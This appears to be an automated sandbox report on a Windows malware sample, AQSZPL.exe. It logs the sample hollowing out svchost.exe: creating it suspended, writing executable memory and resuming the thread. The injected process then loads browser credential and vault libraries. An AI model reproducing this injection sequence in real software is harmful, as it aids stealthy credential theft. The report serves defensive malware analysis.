4f44cc16a1854f91e48261ccfebc5bbe8997215e50513bc3080c6127031774c2 (SHA256)
AQSZPL.exe
Windows Exe (x86-32)
Created at 2018-09-03 11:32:00
Notifications (1/1)
The overall sleep time of all monitored processes was truncated from "21 minutes" to "3 minutes, 30 seconds" to reveal dormant functionality.
Monitored Processes
Behavior Information - Sequential View
Process #1: aqszpl.exe
32
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\users\ciihmnxmn6ps\desktop\aqszpl.exe |
| Command Line | "C:\Users\CIiHmnxMn6Ps\Desktop\AQSZPL.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:55, Reason: Analysis Target |
| Unmonitor | End Time: 00:01:05, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xee4 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EE8
0x
EEC
0x
EF0
0x
EF4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| aqszpl.exe | 0x00630000 | 0x006a7fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x00000000006b0000 | 0x006b0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x006bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x006f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x00843fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x00851fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x00860fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x00870fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x00890fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x008b0000 | 0x0096dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000970000 | 0x00970000 | 0x009affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x009b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000009c0000 | 0x009c0000 | 0x009cffff | Private Memory | - |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x009dffff | Private Memory | - |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x009effff | Private Memory | - |
|
|
|
- |
| private_0x00000000009f0000 | 0x009f0000 | 0x009fffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000a00000 | 0x00a00000 | 0x00a0ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000a10000 | 0x00a10000 | 0x00a1ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000a20000 | 0x00a20000 | 0x00a2ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000a30000 | 0x00a30000 | 0x00a6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x00a70fff | Pagefile Backed Memory | rw |
|
|
|
- |
| l_intl.nls | 0x00a80000 | 0x00a82fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d90000 | 0x00d90000 | 0x00dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000dd0000 | 0x00dd0000 | 0x00ddffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x00de0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e00000 | 0x00e00000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e10000 | 0x00e10000 | 0x00f97fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000fa0000 | 0x00fa0000 | 0x01120fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001130000 | 0x01130000 | 0x0252ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002530000 | 0x02530000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025d0000 | 0x025d0000 | 0x026cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026d0000 | 0x026d0000 | 0x026dffff | Private Memory | - |
|
|
|
- |
| sorttbls.nlp | 0x026e0000 | 0x026e4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000026f0000 | 0x026f0000 | 0x026f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000026f0000 | 0x026f0000 | 0x026fffff | Private Memory | - |
|
|
|
- |
| private_0x0000000002700000 | 0x02700000 | 0x0270ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02710000 | 0x02a46fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002a50000 | 0x02a50000 | 0x04a4ffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x04a50000 | 0x04a90fff | Memory Mapped File | r |
|
|
|
- |
| mscorrc.dll | 0x04aa0000 | 0x04af3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004b00000 | 0x04b00000 | 0x04b2efff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b30000 | 0x04b30000 | 0x04b40fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b50000 | 0x04b50000 | 0x04b60fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004b70000 | 0x04b70000 | 0x04c6ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x04c70000 | 0x04d4efff | Memory Mapped File | r |
|
|
|
- |
| system.windows.forms.ni.dll | 0x71ca0000 | 0x7287ffff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x72880000 | 0x73022fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| system.drawing.ni.dll | 0x734c0000 | 0x73648fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x73640000 | 0x73647fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorjit.dll | 0x73650000 | 0x736aafff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x736b0000 | 0x741a9fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x741b0000 | 0x7424afff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x74250000 | 0x747fffff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74800000 | 0x74807fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x74810000 | 0x74887fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x74890000 | 0x748e8fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74990000 | 0x74a20fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76f30000 | 0x77019fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007fa0d000 | 0x7fa0d000 | 0x7fa0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007fa10000 | 0x7fa10000 | 0x7fb0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fb10000 | 0x7fb10000 | 0x7fb32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fb35000 | 0x7fb35000 | 0x7fb35fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fb36000 | 0x7fb36000 | 0x7fb38fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fb39000 | 0x7fb39000 | 0x7fb3bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fb3c000 | 0x7fb3c000 | 0x7fb3efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fb3f000 | 0x7fb3f000 | 0x7fb3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0xee8
31
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Users\CIiHmnxMn6Ps\Desktop\AQSZPL.exe.config, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
3 | |
| Environment | Get Environment String | name = WinDir, result_out = C:\Windows |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\svchost.exe, os_pid = 0xf20, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Module | Unmap | process_name = C:\Windows\System32\svchost.exe |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\System32\svchost.exe, address = 0x0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 663552 |
|
1 | |
| Process | Terminate | exit_code = 0 |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\svchost.exe, os_pid = 0xf28, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Module | Unmap | process_name = C:\Windows\System32\svchost.exe |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\System32\svchost.exe, address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 663552 |
|
1 | |
| Thread | Get Context | process_name = c:\users\ciihmnxmn6ps\desktop\aqszpl.exe, os_tid = 0xee8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\System32\svchost.exe, address = 0x400000, size = 1024 |
|
1 | |
| Memory | Write | process_name = C:\Windows\System32\svchost.exe, address = 0x401000, size = 79872 |
|
1 | |
| Memory | Protect | process_name = C:\Windows\System32\svchost.exe, address = 0x401000, protection = PAGE_EXECUTE_READWRITE, size = 79605 |
|
1 | |
| Memory | Write | process_name = C:\Windows\System32\svchost.exe, address = 0x415000, size = 16896 |
|
1 | |
| Memory | Protect | process_name = C:\Windows\System32\svchost.exe, address = 0x415000, protection = PAGE_EXECUTE_READWRITE, size = 16480 |
|
1 | |
| Memory | Write | process_name = C:\Windows\System32\svchost.exe, address = 0x41a000, size = 512 |
|
1 | |
| Memory | Protect | process_name = C:\Windows\System32\svchost.exe, address = 0x41a000, protection = PAGE_EXECUTE_READWRITE, size = 548388 |
|
1 | |
| Memory | Write | process_name = C:\Windows\System32\svchost.exe, address = 0x4a0000, size = 8192 |
|
1 | |
| Memory | Protect | process_name = C:\Windows\System32\svchost.exe, address = 0x4a0000, protection = PAGE_EXECUTE_READWRITE, size = 8192 |
|
1 | |
| Memory | Write | process_name = C:\Windows\System32\svchost.exe, address = 0x7edae008, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\ciihmnxmn6ps\desktop\aqszpl.exe, os_tid = 0xee8 |
|
1 | |
| Thread | Resume | process_name = c:\users\ciihmnxmn6ps\desktop\aqszpl.exe, os_tid = 0xee8 |
|
1 |
Thread 0xef4
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Unmap | process_name = c:\users\ciihmnxmn6ps\desktop\aqszpl.exe |
|
1 |
Process #2: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\syswow64\svchost.exe |
| Command Line | "C:\Windows\System32\svchost.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:03, Reason: Child Process |
| Unmonitor | End Time: 00:01:05, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf20 |
| Parent PID | 0xee4 (c:\users\ciihmnxmn6ps\desktop\aqszpl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F24
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000410000 | 0x00410000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x00430fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00453fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x004e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x004f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x00501fff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x00880000 | 0x0088afff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x0488ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e850000 | 0x7e850000 | 0x7e872fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e87b000 | 0x7e87b000 | 0x7e87dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e87e000 | 0x7e87e000 | 0x7e87efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e87f000 | 0x7e87f000 | 0x7e87ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #3: svchost.exe
1522
277
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\syswow64\svchost.exe |
| Command Line | "C:\Windows\System32\svchost.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:57, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf28 |
| Parent PID | 0xee4 (c:\users\ciihmnxmn6ps\desktop\aqszpl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F2C
0x
F30
0x
F34
0x
F38
0x
F98
0x
D0C
0x
C6C
0x
C70
0x
D64
0x
CFC
0x
7E4
0x
2D4
0x
510
0x
E38
0x
E10
0x
E20
0x
E28
0x
E24
0x
DF8
0x
E00
0x
528
0x
858
0x
EAC
0x
EC4
0x
1A0
0x
C30
0x
F4C
0x
A7C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000400000 | 0x00400000 | 0x004a1fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x0062ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x00630fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x00640fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x00663fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006b0000 | 0x006b0000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x006f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00700fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x00711fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00720000 | 0x007ddfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x007e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x007f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x00800fff | Private Memory | rw |
|
|
|
- |
| tzres.dll | 0x00800000 | 0x00802fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x00804fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x00802fff | Private Memory | rw |
|
|
|
- |
| tzres.dll.mui | 0x00810000 | 0x00818fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x00811fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x00836fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x00880000 | 0x0088afff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x0488ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004890000 | 0x04890000 | 0x048cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004900000 | 0x04900000 | 0x049fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a00000 | 0x04a00000 | 0x04afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c00000 | 0x04c00000 | 0x04d87fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x04da3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04efffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f00000 | 0x04f00000 | 0x05080fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005090000 | 0x05090000 | 0x0648ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06490000 | 0x067c6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000067d0000 | 0x067d0000 | 0x068cffff | Private Memory | rw |
|
|
|
- |
| ucrtbase.dll | 0x068d0000 | 0x069abfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000068d0000 | 0x068d0000 | 0x069cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000068d0000 | 0x068d0000 | 0x069d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000068d0000 | 0x068d0000 | 0x0690ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006930000 | 0x06930000 | 0x06933fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006940000 | 0x06940000 | 0x06a3ffff | Private Memory | rw |
|
|
|
- |
| ucrtbase.dll | 0x069b0000 | 0x06a8bfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000006a40000 | 0x06a40000 | 0x06a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006a90000 | 0x06a90000 | 0x06b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006b90000 | 0x06b90000 | 0x06d8efff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006b90000 | 0x06b90000 | 0x06bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006c00000 | 0x06c00000 | 0x06cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006d00000 | 0x06d00000 | 0x06efefff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006d00000 | 0x06d00000 | 0x06dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006e00000 | 0x06e00000 | 0x06efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006f00000 | 0x06f00000 | 0x06ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007000000 | 0x07000000 | 0x070fffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x73450000 | 0x7347efff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x73480000 | 0x7349afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x734a0000 | 0x734b2fff | Memory Mapped File | rwx |
|
|
|
- |
| nss3.dll | 0x73580000 | 0x736aefff | Memory Mapped File | rwx |
|
|
|
- |
| freebl3.dll | 0x744b0000 | 0x74504fff | Memory Mapped File | rwx |
|
|
|
- |
| nssdbm3.dll | 0x74510000 | 0x74528fff | Memory Mapped File | rwx |
|
|
|
- |
| softokn3.dll | 0x74530000 | 0x74555fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp140.dll | 0x74560000 | 0x745ccfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74560000 | 0x74587fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x74590000 | 0x74597fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x745a0000 | 0x745e5fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x745d0000 | 0x745f0fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x745f0000 | 0x745f7fff | Memory Mapped File | rwx |
|
|
|
- |
| dbghelp.dll | 0x74600000 | 0x7473efff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74600000 | 0x7462ffff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74630000 | 0x746b3fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x746c0000 | 0x7470dfff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x74710000 | 0x74717fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x74720000 | 0x74738fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74740000 | 0x74747fff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x74740000 | 0x74752fff | Memory Mapped File | rwx |
|
|
|
- |
| winmmbase.dll | 0x74750000 | 0x74772fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x74760000 | 0x74773fff | Memory Mapped File | rwx |
|
|
|
- |
| ucrtbase.dll | 0x74780000 | 0x7485bfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x74780000 | 0x7479bfff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x747a0000 | 0x747a9fff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x747b0000 | 0x747bffff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x747c0000 | 0x747d2fff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x747e0000 | 0x748a4fff | Memory Mapped File | rwx |
|
|
|
- |
| vcruntime140.dll | 0x74860000 | 0x74873fff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x74880000 | 0x74887fff | Memory Mapped File | rwx |
|
|
|
- |
| mozglue.dll | 0x74890000 | 0x748b1fff | Memory Mapped File | rwx |
|
|
|
- |
| vaultcli.dll | 0x748b0000 | 0x748e5fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x748c0000 | 0x748e3fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x74ac0000 | 0x74ac6fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
